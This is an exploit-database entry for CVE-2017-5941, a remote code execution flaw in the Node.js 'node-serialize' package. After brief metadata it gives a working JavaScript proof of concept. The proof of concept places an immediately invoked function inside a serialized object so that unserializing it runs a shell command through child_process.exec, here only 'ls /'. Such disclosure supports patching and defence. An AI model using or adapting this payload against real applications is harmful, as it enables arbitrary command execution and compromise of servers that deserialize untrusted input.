Node.JS - 'node-serialize' Remote Code Execution



EKU-ID: 49180 CVE: CVE-2017-5941 OSVDB-ID:
Author: OpSecX Published: 2017-02-08 Verified: Not Verified
Download:

Rating

☆☆☆☆☆
Home 


var serialize = require('node-serialize');
var payload = '{"rce":"_$$ND_FUNC$$_function (){require(\'child_process\').exec(\'ls /\', function(error, stdout, stderr) { console.log(stdout) });}()"}';
serialize.unserialize(payload);